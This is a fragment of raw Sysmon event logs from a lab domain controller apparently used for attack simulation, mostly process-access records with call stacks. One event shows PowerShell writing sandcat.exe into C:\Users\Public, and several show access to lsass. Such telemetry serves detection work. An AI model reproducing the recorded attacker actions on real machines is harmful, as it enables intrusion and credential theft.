10:39:58.479{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001019Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.417{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001018Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.417{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001017Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.417{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001016Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.401{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001015Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.401{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001014Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.401{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000001013Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.localEXE2020-10-09 10:39:57.620{733EE690-3DF9-5F80-1900-000000007F01}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\sandcat.exe2020-10-09 10:39:57.620 10341000x80000000000000001012Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.198{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001011Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.198{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001010Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.198{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001009Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.198{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001008Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.198{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001007Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.167{733EE690-3DF9-5F80-1000-000000007F01}11322352C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001006Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.167{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001005Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.151{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001004Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.151{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001003Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.135{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001002Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.135{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001001Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.135{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001000Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.135{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000999Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.135{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000998Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:57.042{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1C00-000000007F01}2196C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000997Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:56.776{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1C00-000000007F01}2196C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000996Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:56.776{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1C00-000000007F01}2196C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000995Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 